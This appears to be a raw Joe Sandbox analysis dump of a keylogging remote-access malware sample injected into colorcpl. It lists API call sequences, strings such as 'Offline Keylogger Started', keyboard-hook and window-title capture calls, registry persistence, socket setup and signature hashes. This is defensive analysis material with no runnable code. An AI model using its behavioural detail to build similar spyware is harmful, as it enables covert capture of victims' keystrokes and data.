                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: e59ef1762c28a75f8cd37254819ed9068702b3801e8065605500bbf4edeab8eb
                                                          • Instruction ID: e9fdad1fb79102e0e8b3b20c9cff3db1077c05febcbd34f0647d50b45ea9c7e6
                                                          • Opcode Fuzzy Hash: e59ef1762c28a75f8cd37254819ed9068702b3801e8065605500bbf4edeab8eb
                                                          • Instruction Fuzzy Hash: 1C11CAB56002087EBA20BB35DC96C7F776EDE816D8B40052DFB4612155EA61AD14CFF2

                                                          Control-flow Graph

                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,03004EE0,03005598,?,?,?,?,02FA5D11,?,00000001), ref: 02F94F81
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,03004EE0,03005598,?,?,?,?,02FA5D11,?,00000001), ref: 02F94FCD
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 02F94FE0
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 02F94F94
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 805df25eddab79111a3b0f2f1b89d7ca25416c9678479aca0d598824b476e3e9
                                                          • Instruction ID: abc91a99ddaa17f42b02c81c9da4694cd95487779b8d63495ef445aa77ca3fa4
                                                          • Opcode Fuzzy Hash: 805df25eddab79111a3b0f2f1b89d7ca25416c9678479aca0d598824b476e3e9
                                                          • Instruction Fuzzy Hash: F811CA35D002856AEF22A7B69C0CF9BBFAD9FD2798F04050EE64257250D6B49446CBB1
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02FA37B9
                                                          • RegSetValueExA.KERNEL32(?,02FF74C8,00000000,?,00000000,00000000,030052F0,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37E1
                                                          • RegCloseKey.KERNEL32(?,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 5fef1608d9244c50bb6bd09a315254264fd40574823fdd7f85a7c709ae61fdb1
                                                          • Instruction ID: a44e8245ab2b9172234d4488ad4b1781c90e786b7dc2135c04dc27e49e5d8f06
                                                          • Opcode Fuzzy Hash: 5fef1608d9244c50bb6bd09a315254264fd40574823fdd7f85a7c709ae61fdb1
                                                          • Instruction Fuzzy Hash: 17F06D7294011CFBDF01AFA0DC55EEA7B6CEF04690F104654FE0AAA110EB319E14DBA0
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,03004F50), ref: 02F94DB3
                                                          • CreateThread.KERNEL32(00000000,00000000,?,03004EF8,00000000,00000000), ref: 02F94DC7
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02F94DD2
                                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 02F94DDB
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: 95beb50d56e50969a101e67026ce2f13f41ebdc1aadac153418a9e12e548a631
                                                          • Instruction ID: 598ed9cd16d9cd3004c29ed3825696d9c1007e6e2ce344f2016fc8a3179427c5
                                                          • Opcode Fuzzy Hash: 95beb50d56e50969a101e67026ce2f13f41ebdc1aadac153418a9e12e548a631
                                                          • Instruction Fuzzy Hash: BE41E671548305AFEF11FB60CD44EBFB7EEAF94390F00092DFA8682190DB2099098F61
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02F9A788), ref: 02F9A6E6
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02F9A788), ref: 02F9A6F5
                                                          • Sleep.KERNEL32(00002710,?,?,?,02F9A788), ref: 02F9A722
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02F9A788), ref: 02F9A729
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID:
                                                          • API String ID: 1958988193-0
                                                          • Opcode ID: f03e2c1799d6985fb7d26ee7211ccc0130ece65debda131be1beebd32c46724e
                                                          • Instruction ID: 8533f5a2fb7d456f6d801034936feb0c12351546bc8201ad524c9ba16177c892
                                                          • Opcode Fuzzy Hash: f03e2c1799d6985fb7d26ee7211ccc0130ece65debda131be1beebd32c46724e
                                                          • Instruction Fuzzy Hash: 8A112030A45644AEFF32A728DCD962E7BBBEB462D9F440808E38247586C7575854CF27
                                                          APIs
                                                          • socket.WS2_32(?,00000001,00000006), ref: 02F94852
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,02F9530B,?,?,00000000,00000000,?,Offline Keylogger Started,00000000,02F95208,?,00000000), ref: 02F9488E
                                                            • Part of subcall function 02F9489E: WSAStartup.WS2_32(00000202,00000000), ref: 02F948B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID: X=t
                                                          • API String ID: 1953588214-2691586945
                                                          • Opcode ID: 0c89d50d013901c9a7dc0c9836d1c72733055d65910da43bbd6694f27edfebb0
                                                          • Instruction ID: 0d26b1cc09b9d12538aa6a09d262811f2dac7ed659ea63b5694937cb739af053
                                                          • Opcode Fuzzy Hash: 0c89d50d013901c9a7dc0c9836d1c72733055d65910da43bbd6694f27edfebb0
                                                          • Instruction Fuzzy Hash: 0A017171808BC09FEB359F28A449786BFE4AB15314F044D5EF1D697B91D7B5A441CF10
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,X=t,030050E4,00000000,02FA51C3,00000000,00000001), ref: 02FA4F46
                                                          • WSASetLastError.WS2_32(00000000), ref: 02FA4F4B
                                                            • Part of subcall function 02FA4DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02FA4E10
                                                            • Part of subcall function 02FA4DC1: LoadLibraryA.KERNEL32(?), ref: 02FA4E52
                                                            • Part of subcall function 02FA4DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02FA4E72
                                                            • Part of subcall function 02FA4DC1: FreeLibrary.KERNEL32(00000000), ref: 02FA4E79
                                                            • Part of subcall function 02FA4DC1: LoadLibraryA.KERNEL32(?), ref: 02FA4EB1
                                                            • Part of subcall function 02FA4DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02FA4EC3
                                                            • Part of subcall function 02FA4DC1: FreeLibrary.KERNEL32(00000000), ref: 02FA4ECA
                                                            • Part of subcall function 02FA4DC1: GetProcAddress.KERNEL32(00000000,?), ref: 02FA4ED9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                          • String ID: X=t
                                                          • API String ID: 1170566393-2691586945
                                                          • Opcode ID: 2c83fb3846ff813558495ed05f5c1dc0fad96139a9ed8a5f8b7ab3c8420335a4
                                                          • Instruction ID: eeec4e90d9a22ab4b66a20832c589bc2851fdb96a7c6ecd57f0a457159e406ec
                                                          • Opcode Fuzzy Hash: 2c83fb3846ff813558495ed05f5c1dc0fad96139a9ed8a5f8b7ab3c8420335a4
                                                          • Instruction Fuzzy Hash: DCD017726021256FE320A769AC04AAEAA9EDF967A4F110426F910DB641DAD48C9286A0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02FA3605
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02FA3622
                                                          • RegCloseKey.KERNEL32(?), ref: 02FA362D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 90abb578344ef77efbbf80055bcbdcd1895e56522eea52a402e9d0ab4767ed68
                                                          • Instruction ID: 0be1d473b3bed0dbffc3ade8a64fe9e48d55e2808a74ae0fec82d2d48c716c6c
                                                          • Opcode Fuzzy Hash: 90abb578344ef77efbbf80055bcbdcd1895e56522eea52a402e9d0ab4767ed68
                                                          • Instruction Fuzzy Hash: 0A01A2BAE40128BBDF219AA5DD08DEEBB7DDB44B90F004095BB05E2200DA708A159BB0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,030052F0), ref: 02FA374F
                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02FA3768
                                                          • RegCloseKey.KERNEL32(00000000), ref: 02FA3773
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 5b5ec85d0cf99f6f042485db10d5081de076b22a4ae6299a1fd1e7a770a81ddc
                                                          • Instruction ID: 9185ee9f7d6ff371b88c03ca5695b848f3e71456ced0b37bd07bc8462cf8c33d
                                                          • Opcode Fuzzy Hash: 5b5ec85d0cf99f6f042485db10d5081de076b22a4ae6299a1fd1e7a770a81ddc
                                                          • Instruction Fuzzy Hash: 8A014BB280412DFBDF219FA1DC44DEA7F79EF057A0F004190BF0966010DB318965DBA0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02FA35A4
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,030052F0), ref: 02FA35C2
                                                          • RegCloseKey.KERNEL32(?), ref: 02FA35CD
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: bd8095ce2ed7427541a4e307ae439e3f8708f63cdef7256b080d7df5544389ca
                                                          • Instruction ID: b8d84f244952d67224d6702cf7577ead4f4e096713c0022537b063826c5e0862
                                                          • Opcode Fuzzy Hash: bd8095ce2ed7427541a4e307ae439e3f8708f63cdef7256b080d7df5544389ca
                                                          • Instruction Fuzzy Hash: 04F01D76E4021CFFDF119EA49C45FEDBBBCEB04B90F104495BB04EA241D6715A249BA0
                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,02F9C1D7,02FF6C58), ref: 02FA3551
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,02F9C1D7,02FF6C58), ref: 02FA3565
                                                          • RegCloseKey.KERNEL32(?,?,?,02F9C1D7,02FF6C58), ref: 02FA3570
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                           • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: 542fa06ddea43e7da96649421cdc73fb94de6e6939b72d973952a3ff5a5ab718
                                                          • Instruction ID: d9718fa7a7f6302a25246d129396209657ac3b63a66b5e9e450b12330e9126be
                                                          • Opcode Fuzzy Hash: 542fa06ddea43e7da96649421cdc73fb94de6e6939b72d973952a3ff5a5ab718
                                                          • Instruction Fuzzy Hash: 91E06572D41238FFDF214AB29C0DDEBBF6CDF06AE0B400584BE0895101D2615E10D6F0
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,02FF60B4), ref: 02FA38C0
                                                          • RegSetValueExA.KERNEL32(02FF60B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38DB
                                                          • RegCloseKey.ADVAPI32(02FF60B4,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38E6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID:
                                                          • API String ID: 1818849710-0
                                                          • Opcode ID: 267639aaca4f5c35b93d5462cff34252f91104d5737e7af4ffd1cf9343b039a7
                                                          • Instruction ID: 2adb93daf277679f4e4e4ae507d1370f194dbd05a7fd0e34a6cc89727cf21160
                                                          • Opcode Fuzzy Hash: 267639aaca4f5c35b93d5462cff34252f91104d5737e7af4ffd1cf9343b039a7
                                                          • Instruction Fuzzy Hash: 10E03972A40218FBDF119EA09C06FEABB6CEF04AA0F004595BF04AA140D6718A2497A0
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 02FAB85B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: @
                                                          • API String ID: 1890195054-2766056989
                                                          • Opcode ID: a2e940c40e56a232ce944cf6094498fc3aecd8422e5ec74afff33add19685d88
                                                          • Instruction ID: 98f2dbad9facf63f75d593af84bcf0fdb13069966ea12d08bc593fff9a0079fe
                                                          • Opcode Fuzzy Hash: a2e940c40e56a232ce944cf6094498fc3aecd8422e5ec74afff33add19685d88
                                                          • Instruction Fuzzy Hash: BED017B580231C9FC720EFA9E805A8DBBFCFB08214F00416AED49E3700E774A8048B84
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID:
                                                          • API String ID: 180926312-0
                                                          • Opcode ID: 41e410d0d94ac8cebd4e5c351c11a3043476979a7c7a8891c4931b0c475aeb32
                                                          • Instruction ID: 1bbb59b650b5d641977171d20084c28324e25301565572a414b734de021331ce
                                                          • Opcode Fuzzy Hash: 41e410d0d94ac8cebd4e5c351c11a3043476979a7c7a8891c4931b0c475aeb32
                                                          • Instruction Fuzzy Hash: 9251B5716082455AEB24FB31DCA0AFFB3A6AF91784F50493DE74A471D0EF30590ACE92
                                                          APIs
                                                            • Part of subcall function 02FD8295: GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82CC
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                            • Part of subcall function 02FD8295: _abort.LIBCMT ref: 02FD8313
                                                            • Part of subcall function 02FDF0F7: _abort.LIBCMT ref: 02FDF129
                                                            • Part of subcall function 02FDF0F7: _free.LIBCMT ref: 02FDF15D
                                                            • Part of subcall function 02FDED6C: GetOEMCP.KERNEL32(00000000,?,?,02FDEFF5,?), ref: 02FDED97
                                                          • _free.LIBCMT ref: 02FDF050
                                                          • _free.LIBCMT ref: 02FDF086
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast_abort
                                                          • String ID:
                                                          • API String ID: 2991157371-0
                                                          • Opcode ID: 1f8503c25e72da39a985d22f5b99530d5137fb474669dc478aa7aed59f8f0827
                                                          • Instruction ID: 97c46af536b46fa5da8f2ceac642806a9d00861f954fc53dce228f2a18ee3fdc
                                                          • Opcode Fuzzy Hash: 1f8503c25e72da39a985d22f5b99530d5137fb474669dc478aa7aed59f8f0827
                                                          • Instruction Fuzzy Hash: 4E31F131D00148AFDB10EBA8D848FA9B7F7EF447A5F6C4299E6059B691EB369D40CF40
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD6227
                                                            • Part of subcall function 02FD61B8: RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,02FC2F93,00000000,0000000F,02FBF99D,?,?,02FC1A44,?,?,00000000), ref: 02FD6263
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap$_free
                                                          • String ID:
                                                          • API String ID: 1482568997-0
                                                          • Opcode ID: 0d8cd157feb119dc06fb9fec7784589438ca6f4b767d4e4b6fc2523a35b939ca
                                                          • Instruction ID: c17a73ee85a770c5935488e7d9ea613d3ee899ec8b257e0fe680b1b87b451074
                                                          • Opcode Fuzzy Hash: 0d8cd157feb119dc06fb9fec7784589438ca6f4b767d4e4b6fc2523a35b939ca
                                                          • Instruction Fuzzy Hash: 6FF06232E42115AA9F212A25BC04F6B376F8FD2BF6F1C4159EB54E6184DF30940089A1
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                          • Instruction ID: 08be4649bf27974caeaee7376a7e7b78a637e317562a2bfbf7c84c4ce51a8b8e
                                                          • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                          • Instruction Fuzzy Hash: D1F05EB1F092035AEF1C8B34896472A77965B802E5F648B3DF26EC61D0D731C9958E04
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 02FABB49
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 02FABB5C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$ForegroundText
                                                          • String ID:
                                                          • API String ID: 29597999-0
                                                          • Opcode ID: cc993fde039ca97e27a9a6b3dcb09d7958dbc31b37188631e10a75e824b9a6c2
                                                          • Instruction ID: 37f0cbb1d69a74cfbaabb539fb87833446cb7e030111e6aa1f0db5444f4967e4
                                                          • Opcode Fuzzy Hash: cc993fde039ca97e27a9a6b3dcb09d7958dbc31b37188631e10a75e824b9a6c2
                                                          • Instruction Fuzzy Hash: 1DE04875E4032C6BFB30A6A49C4DFD5776C9704790F000599B61CD72C5EEA169548BE1
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,02F9EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,02FF60CC,00000003,00000000), ref: 02F9D0B3
                                                          • GetLastError.KERNEL32 ref: 02F9D0BE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID:
                                                          • API String ID: 1925916568-0
                                                          • Opcode ID: d4756bc88a9b320ef1f53d4126dfce6f7c0a3006e1dc46d0b4eeef26c76fd3bb
                                                          • Instruction ID: d0441967617290abbd03847a97d6287031129732c93fdb12d5ec518cc4f3b8ee
                                                          • Opcode Fuzzy Hash: d4756bc88a9b320ef1f53d4126dfce6f7c0a3006e1dc46d0b4eeef26c76fd3bb
                                                          • Instruction Fuzzy Hash: ACD01270A4A204DBEF487B70D85D75979959744741F400829F20BC95C0DBB448A04A21
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: 0dea954fc5b986c6fdaeecd243983f28cef98818bb9f169f92f4c739e89d0d3c
                                                          • Instruction ID: 6a773f08bc336ec372824c3bc6c3323ec8887f013404e46f05d7941f229c611a
                                                          • Opcode Fuzzy Hash: 0dea954fc5b986c6fdaeecd243983f28cef98818bb9f169f92f4c739e89d0d3c
                                                          • Instruction Fuzzy Hash: D61190319052099BEF15FF68EC50AEF7BBAAF54354B10002EEA0693290EF74A915CF90
                                                          APIs
                                                          • CallNextHookEx.USER32(030050F0,?,?,?), ref: 02F9A40D
                                                            • Part of subcall function 02F9B681: GetKeyState.USER32(00000011), ref: 02F9B686
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CallHookNextState
                                                          • String ID:
                                                          • API String ID: 3280314413-0
                                                          • Opcode ID: a8dc79b6b131f0260330f0986788b9d2539e13af318e94ea637f729253b67e8f
                                                          • Instruction ID: 3311d1ed9a5ef298ad6ba7d9b42779adae82f63c759cb82fd13dfb1d7e3dc020
                                                          • Opcode Fuzzy Hash: a8dc79b6b131f0260330f0986788b9d2539e13af318e94ea637f729253b67e8f
                                                          • Instruction Fuzzy Hash: 31F0D1726042059BEF15AEBCED4892A775AEB8A3C4F000429EB8246995CA62D8299F11
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,02FC5349,?,?,02FC88C7,?,?,00000000,?,?,02F9DE9D,02FC5349,?,?,?,?), ref: 02FD61EA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 472cc55cfceec155afe86fcca509b2e5152f48bb7a4db9ede76720f4c45574a7
                                                          • Instruction ID: 80cbd346882e9e6da356d040c3370a361fb38189ae0bca1b443b1fc58558ad8e
                                                          • Opcode Fuzzy Hash: 472cc55cfceec155afe86fcca509b2e5152f48bb7a4db9ede76720f4c45574a7
                                                          • Instruction Fuzzy Hash: A1E06D33E4122257FB312A66BC04B9B7B5F9B42BF4F1D0221AF15D6186CF61D901CAE1
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 02F948B3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID:
                                                          • API String ID: 724789610-0
